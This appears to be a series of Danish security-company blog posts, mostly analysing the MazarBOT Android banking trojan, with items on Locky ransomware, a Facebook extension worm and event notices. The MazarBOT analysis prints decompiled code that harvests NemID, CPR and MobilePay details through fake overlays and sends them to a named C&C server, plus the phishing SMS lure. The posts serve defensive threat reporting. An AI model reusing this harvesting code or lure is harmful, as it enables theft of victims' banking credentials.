Android datatyven, som vi har døbt MazarBOT, er sent i går og her til formiddag blevet SMS'et ud til vilkårlige numre i Danmark.

Den pågældende SMS ankommer med følgende ordlyd (saniteret af CSIS):

"Du har modtaget en MMS-besked fra +4529781229. Følg linket https://bitly[.]com/1TIny9Z".

Se SMS herunder:


Det pågældende link er en legitim URL forkorter tjeneste, som flytter trafikken videre til websiden (saniteret af CSIS) mmsforyou[.]pw/mms.apk. Det pågældende domæne er naturligvis blokeret i CSIS Secure DNS og Heimdal PRO/corporate.  

Den pågældende APK der tilbydes, er en Android applikation, som forsøger at opnå talrige rettigheder på enheden, hvis applikationen køres af en uforsigtig bruger. Se skærmdump herunder:


I næste fase indrulles Android mobilen i et centralt BOTnet. Det sker via følgende API kald (saniteret af CSIS):

org.apache.http.impl.client.DefaultHttpClient.execute ->
(URL: "http://37.1.204[.]175/?action=command",

POST data: "{"os":"4.2.1","model":"Samsung Galaxy Nexus"
"apps":["exts.denmark"]
"imei":"%nr%"
"install id":"1"
"sms":[]
"type":"install"
"operator":"%data%"
"country":"DK"}"
"TelephonyManager.getDeviceId=[ID"). 

Denne funktionalitet er fint og overskueligt defineret i nedenstående:

import android.app.IntentService;
import android.content.Intent;
import android.content.SharedPreferences;
import exts.denmark.utils.RequestFactory;
import exts.denmark.utils.Sender;
import exts.denmark.utils.Utils;
import org.apache.http.impl.client.DefaultHttpClient;
import org.json.JSONObject;

APK pakken er blevet døbt "exts.denmark" af bagmændene og denne gang udvider den sit angreb til decideret at gå efter NemID, Mobilebank og Mobilepay. Vi har dekompileret hele koden og gennemgået samtlige funktioner som afslører at den gøre brug af overlay til at høste sensitive oplysninger som ofret skal lokkes til at indtaste igennem de "forfalskede dialogbokse" som laves over den legitime applikation. Herunder er funktionen gengivet, som høster CPR nummer, NemID brugernavn og password via overlay teknik:

String encodedImage = Utils.getEncodedImage(intent.getStringExtra("nem id"));
JSONObject cardData = new JSONObject();
cardData.put("cpr", intent.getStringExtra("cpr"));
cardData.put("phone", intent.getStringExtra("phone"));
cardData.put("password", intent.getStringExtra("password"));
cardData.put("nem id", encodedImage);
Sender.request(this.httpClient, Constants.ADMIN_LINK,
RequestFactory.makeCardData(appId, cardData).toString());
Utils.putBoolVal(settings, Constants.CARD_SENT, true);
updateCardUIIntent = new Intent(UPDATE_CARDS_UI);
updateCardUIIntent.putExtra("status", true);
sendBroadcast(updateCardUIIntent);

Som det kan ses, så lagres de høstede data via "UPDATE_CARDS_UI" og sendes herefter til de it-kriminelles C&C server. 

Det samme gør sig gælgende for "Mobilepay" høsteren:  

exts.denmark.MainService.3 */
class C00413 implements Runnable {
C00413() {
}

public void run() {
if (MainService.this.getTop().contains("dk.danskebank.mobilepay") && !
MainService.settings.getBoolean(Constants.CARD_SENT, false)) {
Intent i = new Intent(MainService.this, MobileBank.class);
i.addFlags(268435456);
MainService.this.startActivity(i);

SNIP:

} catch (Exception e) {
if (action.equals(REPORT_CARD_DATA)) {
updateCardUIIntent = new Intent(UPDATE_CARDS_UI);
updateCardUIIntent.putExtra("status", false);
sendBroadcast(updateCardUIIntent);

Og igen er hele denne funktionalitet samlet i følgende:

public static final String REPORT_CARD_DATA = "REPORT_CARD_DATA";
public static final String REPORT_INCOMING_MESSAGE = "REPORT_INCOMING_MESSAGE";
public static final String REPORT_INTERCEPT_STATUS = "REPORT_INTERCEPT_STATUS";
public static final String REPORT_LOCK_STATUS = "REPORT_LOCK_STATUS";
public static final String REPORT_SAVED_ID = "REPORT_SAVED_KEY";
public static final String REPORT_SENT_MESSAGE = "REPORT_SENT_MESSAGE";
public static final String UPDATE_CARDS_UI = "UPDATE_CARDS_UI";
private static SharedPreferences settings;
private DefaultHttpClient httpClient;


Denne variant af MazarBOT dropper ikke længere TOR. Men den opnår fortsat rettigheder som gør den i stand til at udføre en stribe af forskellige handlinger på telefonen, herunder opsamle kald og SMS'er, foretage og viderestille opkald, slette telefonen via forskellige metoder, høste telefonumre osv.

Rettighederne, som kræves når applikationen køres, er gengivet herunder:

<uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.WAKE_LOCK" /> <uses-permission android:name="android.permission.GET_TASKS" /> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" /> <uses-permission android:name="android.permission.RECEIVE_SMS" /> <uses-permission android:name="android.permission.SEND_SMS" /> <uses-permission android:name="android.permission.READ_SMS" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />

APK'en er signeret med følgende data:

thumbprint: 5A912A1FFF551139F72C5CF71BCBDF687505F31C
validfrom: 12:20 PM 02/17/2015
serialnumber: 563A8E37
Subject
DN: C=US, O=Android, CN=Android Debug
C: US
CN: Android Debug
O: Android
Issuer
DN: C=US, O=Android, CN=Android Debug

5400 kliks!
Når en gruppe af IT-kriminelle anvender bitly.com som springbræt, overvejer de måske ikke den mulighed at man som almindelig efterforsker kan tilføje et + til URI'en, hvorved der opnås adgang til statistik for hvor mange der har klikket på det pågældende link. Vi antager naturligvis, at der blandt de mange kliks kan gemme sig nysgerrige personer og researchere men hele 5.400 som har klikket på linket er alligevel rigtigt mange, og illustrerer hvor alvorlig en trussel MazarBOT har vokset sig til. Se skærmdump herunder:


C&C server
MazarBOT er som navnet antyder et BOTnet. Når en maskine indrulles kan de it-kriminelle via et grafisk interface kontrollere den enkelte mobiltelefon, eller udstede en klynge-kommando til alle indrullede Android telefoner på samme tid.

C&C serveren er hostet på IP adressen 37.1.204.175

Country:        NL
admin-c:        TNTS-RIPE
tech-c:         TNTS-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-3NT
mnt-routes:     SERVERIUS-MNT
created:        2011-12-13T12:45:15Z
last-modified:  2014-11-22T07:40:47Z
source:         RIPE

Generelt er dette en yderst raffineret datatyv, og vi frygter, og med god grund, at de it-kriminelle vil forfine den ondsindede kode med ny funktionalitet. Også det, at opdatere mobiltelefoner centralt via BOTnettet gør dette til en persistent trussel. 

Antivirus detektion af den analyserede kode, giver os:
https://www.virustotal.com/en/file/4b425799100ea3fb4f10dbcedf0a01e2d8b82fc3c7457066a6cccb84d9065b5b/analysis/

Analyse: Peter Kruse, CSIS eCrime Unit

Vi har tidligere i denne uge været ude med en opgradering af risikoen for Locke (også kendt som Locky) infektion. Locke er en modbydelig ransomware.

Den seneste måned er Locke/Locky, med stor sucess for bagmændene, blevet spredt via pakkede arkiver (zip/rar) i spammails, og med en .js (javascript) i arkivet. Når disse åbnes, af en uforsigtig modtager, aktiveres "wscript.exe", som kører koden, der så igangsætter nedhentning og kørsel af Locke/Locky.

Se et skærmdump af en klassisk Locke spammail herunder:


Men vidste du, at der er et simpelt modsvar på denne type angreb?

En løsning, som vil fungere for langt de fleste slutbrugere, vil være at erstatte eller fjerne associationen til .js filer via f.eks. "HKEY_CLASSES_ROOT.js" og værdien "JSFile" (se skærmdump) hvor vi med Windows værktøjet "regedit" har navigeret til Windows håndtering af .js filer:


Ved kørsel af en ondsindet .js fil, vil dette forhindre koden i at afvikles, idet tilknytningen er fjernet. Se eksempel herunder:


Det vil imidlertid ikke forhindre javascript i at køre via browseren, da Locke/Locky og Dridex spredes via e-mail (og som .js), og dermed åbnes udenfor browseren, hvorved dette er et effektivt workaround uden den store risiko for funktionstab i Microsoft Windows.

En anden tilgang kan være at knytte .js filer til notepad, hvorved disse vil blive åbnet i Notepad og dermed aldrig eksekveret:
HKEY_CLASSES_ROOTVisualStudio.js.10.0shellOpenCommand

Som sagt vil dette workaround fungere for langt de fleste slutbrugere og have effekt på al potentiel malware som forsøges droppet via .js filer.

Hvis man i f.eks. virksomhedsmiljøer har behov for at køre .js filer på desktops, kan man overveje at håndtere dem som f.eks. .jsx og så knytte "JSFile" til denne filendelse, hvilket vil give samme resultat, men stadig forhindre .js fra at blive eksekveret. Og det er jo præcist hvad vi vil opnå her.

Sund fornuft og naturlig skepsis og en lille smule antivirus!
Det bedste råd er nu fortsat sund fornuft og naturlig skepsis, men med de mange infektioner, som vi for øjeblikket ser, kan et workaround af denne type, være en, om ikke andet, midlertidig løsning.

Heimdal PRO/Corporate og CSIS Secure DNS
Som en anden forholdsregel kan vi oplyse, at vi dagligt blokerer for i gennemsnit 50 domæner der anvendes til at hente Locke/Locky ned fra. Det betyder med andre ord, at Heimdal PRO/corporate, eller CSIS Secure DNS også kan bidrage til at beskytte din PC eller din virksomhed mod denne type angreb. Og ikke kun fra Locke/Locky, men fra alle andre kendte trusler der anvender domæner til at hente malware eller binde maskinen ind i et BOTnet. På den måde kan vi ikke alene beskytte mod infektioner, men også mod risikoen for datalækage.

Mere information om Heimdal kan findes på:
https://heimdalsecurity.com

CSIS inviterer i samarbejde med SecureDevice til gratis seminar med fokus på IBM QRader SIEM og CSIS Security Analytics Centre Proaktiv Incident Response. 

Seminaret, som vi desværre måtte flytte tidligere grundet sygdom, afholdes i:
Århus d. 17. Maj 2016 kl. 08.00-12.00 hos IBM Client Center, Olof Palmes Alle 44, 8200 Aarhus N.

Program:
08.00 - 08.30   Morgenmad og registrering
08.30 - 08.40   Velkomst v. Michael Albek.
08.40 - 09.20   Trusselsbilledet anno 2016 v. Peter Kruse. Trusler og trends indenfor IT-sikkerhed imod danske virksomheder.
09.20 - 10.00   Log Management, SIEM, SOC eller SAC? v. Michael Albek. Gennemgang af de forskellige løsningsmuligheder.
10.00 - 10.20   Pause og Netværk
10.20 - 11.00   CSIS SAC - 24/7/365 v. Jan Kaastrup. Indblik i Danmarks ledende Security Analytics Centre.
11.00 - 11.20   Paneldiskussion / Q & A's
11.20 - 12.00   Stående frokostbuffet med lette anretninger og netværk

Tilmelding: sacseminar@csis.dk. 

Vi har et begrænset antal pladser til rådighed, så det er først til mølle.

CSIS Security Group A/S kan i samarbejde med ITEK og Finansrådet invitere til den mest eftertragtede it-sikkerhedskonference i Danmark. Konferencen afholdes for 4. år i træk.

Det privatejede danske it-sikkerhedsfirma CSIS Security Group A/S kan i år løfte sløret for en hidtil uset perlerække af internationale talere på dansk jord. Mød bl.a. en spændende keynote fra Eugene Kaspersky og inspirerende indlæg fra firmaer som bl.a. NASA, CERN, ESET, Trendmicro, Barclays, Danske Bank samt mange flere.

"Når vi afholder CCCC16 sker det fordi vi ønsker at sætte fokus på cybercrime", udtaler Peter Kruse, medstifter og it-sikkerhedsekspert i CSIS Security Group, som har bidraget med at udvælge talere til konferencen. "Af samme grund", fortsætter han, "har det været vigtigt for os, at udvælge talere som reelt påvirker trusselsbilledet i den konstante og vedvarende bekæmpelse af international it-kriminalitet".

CCCC16 afholdes i Industriens hus d. 9. juni 2016 og tilbyder flere spor/tracks, som deltagerne kan tilmelde sig ved registrering til konferencen. Blandt de mange spor finder vi "Targeted attacks", Internet of Things (IoT)" og "Critical Infrastucture".

Konferencen afholdes på Engelsk.

Tilmelding og yderligere oplysninger på:
http://cccc-2016.com/

En orm spreder sig i disse dage på Facebook. Den opnår sin effekt ved at sende chat beskeder med indhold fra en inficeret maskine til alle de personer, som du er venner med på Facebook. Derved opnår den en viral effekt. 

Den lokker med indhold som f.eks. "V1DEO-[4 vilkårlige cifre].html. Som det fremgår er der tale om en ordinær HTML fil, men med en indlejret script, som ved et klik, flytter brugeren til en webside hostet i skyen hos Amazon og som ligner en Youtube side (saniteret af CSIS)

<frameset rows="100%">
<frame src="https://s3-eu-west-1.amazonaws[.]com/video47543/red.html">
<noframes>
<body></body>
</noframes>
</frameset>

Den pågældende webside "red.html" består af et lettere obfuseret javascript, som i deobfuskeret form, ser ud som følgende (saniteret af CSIS)


Oversat til dansk betyder det at javacriptet vil bestemme hvilken browser der anvendes. Hvis der anvendes enten Firefox eller Chrome vil du blive tilbudt en browser udvidelse kaldet "45to75". Det er denne del af koden, som skal accepteres af ofret (se nedenstående skærmdump) og hvis det sker, vil den installeres i browseren og starte sin spredning til andre ofre. Den pågældende kode er skrevet i en kombination mellem HTML, JavaScript og CSS. Det er klassisk for browere udvidelser.

Heldigvis kan dette utøj relativt nemt fjernes fra maskinen igen. Det sker ved at åbne browseren i fejlsikret tilstand og manøvrere til extensions/udvidelser og her manuelt slette udvidelsen. Det er ved samme lejlighed en god ide at skifte password til Facebook.

Vi har blokeret domænerne i CSIS Secure DNS og Heimdal PRO/corporate, hvorved vi bremser spredningen af dette uønskede orm.

Som et tillæg udspringer en del af denne uønskede aktivitet fra en server hostet hos OVH i Frankring (saniteret af CSIS) 5.196[.]91.128. Et lille udsnit af domæner, som man med fordel kan blokere hvis man ikke anvender CSIS Secure DNS, omfatter bl.a. (saniteret af CSIS)

labuneamkxxssdwss[.]xyz
kfkejerndjk[.]xyz
dayesaseha[.]xyz
cukdermndnsss[.]info
sigaramindumanisen[.]com
lanadamimeklentisi[.]info

Flere antivirus leverandører kalder denne orm for "JS.Trojan.Kilim" men detektion er desværre lav (3/56):
https://virustotal.com/en/file/772ff3b7ac3a2f1fdb36a9c6b46b9f6235e28f435db8f943146b5c4ad0cf2fa9/analysis/1461223355/

Vi inviterer dig hermed til at besøge os til en snak om alt indenfor it-sikkerhed når vi næste uge er at finde på Infosecurity messen i Øksnehallen, København.

Vi har indrettet os i bås nr 221, hvor vores særlige fokus på denne messe vil være vores Security Analytics Centre. Kig forbi og hør bl.a. om hvorfor geografisk målrettede angreb ikke kan holdes ude af virksomhedens netværk uden en lokal leverandør med internationale kompentencer.

Messen afholdes i næste uge den 3. og 4. Maj 2016.

Vi glæder os til at se dig!

Der er gratis adgang til messen. Klik på banner herunder for tilmelding.

https://www.databadge.net/isdk2016/reg/?link=04c1dcb139b3ec0b68ce&lan=DA

Vi har tidligere været ude med en advarsel omkring Android datatyven, MazarBOT. En raffineret datatyv som kun kan køres på Android baserede smartphones og som spredes via SMS'er med et link til den skadelige APK (Android applikation).

Desværre har vores advarsler ikke været nok til at bremse denne skadelige kode i at inficere næsten 1000 mobiltelefoner i Danmark. Alene i går (onsdag d. 11.5 2016) blev ikke færre end 138 smartphones i Danmark indsamlet i BOTnettet, hvor de drænes for sensitive informationer herunder kreditkort oplysninger som efterfølgende misbruges.

Herunder en graf som illustrerer hvor målrettet denne MazarBOT kampagne opererer og med særligt fokus på at inficere Android Smartphones i Danmark:


Vi ved også, at denne statistik kun dækker en af flere MazarBOT kampagner. MazarBOT har bl.a. massevis af infektioner i Italien og Grækenland.

CSIS monitorerer tæt MazarBOT aktiviteter og har allerede blokeret for talrige domæner i CSIS Secure DNS og Heimdal PRO, som anvendes enten som distributionspunkt eller C&C.

Vi har allerede frigivet flere tekniske artikler omkring denne trussel. Artiklerne kan findes på linksene herunder:

https://www.csis.dk/da/csis/blog/4818/
https://www.csis.dk/da/csis/news/4844/